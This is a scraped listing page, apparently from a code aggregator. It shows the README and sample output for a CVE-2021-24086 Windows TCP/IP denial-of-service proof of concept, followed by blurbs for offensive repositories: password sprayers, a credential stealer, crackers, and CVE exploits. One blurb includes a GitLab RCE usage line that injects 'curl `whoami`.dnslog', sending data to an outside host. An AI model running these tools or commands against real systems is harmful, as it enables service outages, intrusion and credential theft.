IP Denial of Service Vulnerability ")A proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability ")

Last update: Nov 25, 2021

Overview

CVE-2021-24086

This is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability "), a NULL dereference in tcpip.sys patched by Microsoft in February 2021. According to this tweet, the vulnerability has been found by @piazzt. It is triggerable remotely by sending malicious UDP packet over IPv6.

You can read Microsoft's blog here: Multiple Security Updates Affecting TCP/IP:  CVE-2021-24074, CVE-2021-24094, and CVE-2021-24086. It discusses briefly the impact and workaround/mitigations.

A more in-depth discussion about the root-cause is available on doar-e.github.io: Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086).

Running the PoC

Run the cve-2021-24086.py script; it requires Scapy:

[email protected]:~$ sudo python3 cve-2021-24086.py
66 fragments, total size 0xfff8
..................................................................
Sent 66 packets.
.
Sent 1 packets.

Authors

Axel '@0vercl0k' Souchet

Owner

Carry

GitHub Repository

A DOM-based G-Suite password sprayer and user enumerator

1 Apr 07, 2022

Valeria stealer- - (4Feb 2022) program detects wifi saved passwords in your ROM

Valeria_stealer- Requirements : python 3.9.2 and higher (4Feb 2022) program dete

3 May 05, 2022

Automatic SQL injection and database takeover tool

sqlmap sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of

25.7k Jan 08, 2023

StarUML cracker - StarUML cracker With Python

StarUML_cracker Usage On Linux Clone the repo. git clone https://github.com/mana

9 Jun 20, 2022

A brute force tool for password-protected zip file

Bzip A brute force tool for password-protected zip file/folder(s). Note that this tool can only crack .zip files. Please DO not misuse. Installation g

3 Nov 13, 2021

A simple Log4Shell Scan with python

🐞 Log4Scan 🔧 Log4Shell 简单的主动和被动扫描脚本 Log4scan 针对header头和fuzz参数的主动批量扫描，用于大批量黑盒检测

6 Aug 04, 2022

Extensive Python3 network scanner, simplified.

Snake Map Extensive Python3 network scanner, simplified. _,.--. --..,_ .'`__ o `;__, `'.'. .'.'` '---'` '

4 Apr 16, 2022

The Web Application Firewall Paranoia Level Test Tool.

Quick WAF "paranoid" Doctor Evaluation WAFPARAN01D3 The Web Application Firewall Paranoia Level Test Tool. — From alt3kx.github.io Introduction to Par

22 Jul 25, 2022

Notebooks, slides and dataset of the CorrelAid Machine Learning Winter School

CorrelAid Machine Learning Spring School Welcome to the CorrelAid ML Spring School! In this repository you can find the slides and other files for the

12 Nov 23, 2022

You can manage your password with this program.

You must have Python compilers in order to run this program. First of all, download the compiler in the link.

6 Aug 07, 2021

A simple python script for hosting a Snowflake Proxy in your python program or with it's standalone cli

snowflake-cli Snowflake is a system to defeat internet censorship, made by Tor Project. The system works by volunteers who run the snowflake extension

6 Jul 14, 2022

SEBUAH TOOLS TERMUX CRACK AKUN FF HOMKI AKUN EPEP DAH SATU FOLLOW AE YA BROO AWOKWOK

print " INSTALL TOOLS " $ pkg update && upgrade $ pkg install python2 $ pkg install git $ pip2 install lolcat $ pip2 install bs4 $ pip2 install reques

2 Nov 29, 2021

Cve-2022-23131 - Cve-2022-23131 zabbix-saml-bypass-exp

cve-2022-23131 cve-2022-23131 zabbix-saml-bypass-exp replace [zbx_signed_session

135 Dec 14, 2022

🐎🖥《赛马娘》（ウマ娘: Pretty Derby）辅助脚本

auto-derby 自动化养马育成结果 Nurturing result 功能支持客户端 DMM （前台）实验性安卓 ADB 连接（后台）开发基于 1080x1920 分辨率团队赛 (Team race) 有胜利确定奖励时吃帕菲日常赛 (Daily race) PvP 活动赛 (Cha

376 Jan 01, 2023

CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本： Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

70 Nov 09, 2022

Experimental musig2 python code, not for production use!

musig2-py Experimental musig2 python code, not for production use! This is just for testing things out. All public keys are encoded as 32 bytes, assum

14 Jul 08, 2022

Argument Injection in Dragonfly Ruby Gem

CVE-2021-33564 PoC Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem). Usage Arbitrary File Read python3 poc.py -u https://

12 Nov 09, 2022

Let's you scan the entire internet in a couple of hours and identify all Minecraft servers on IPV4

Minecraft-Server-Scanner Let's you scan the entire internet in a couple of hours and identify all Minecraft servers on IPV4 Installation and running i

116 Jan 08, 2023

FOSSLight Scanner performs open source analysis after downloading the source by passing a link that can be cloned by wget or git.

FOSSLight Scanner Analyze at once for Open Source Compliance. FOSSLight Scanner performs open source analysis after downloading the source by passing

8 Nov 03, 2022

Ensure secure infrastructure and consistency with the firewall rules

Python Port Scanner This script tries to check if it's possible to make a connection with the specific endpoint port. This is very useful to ensure se

7 Feb 26, 2022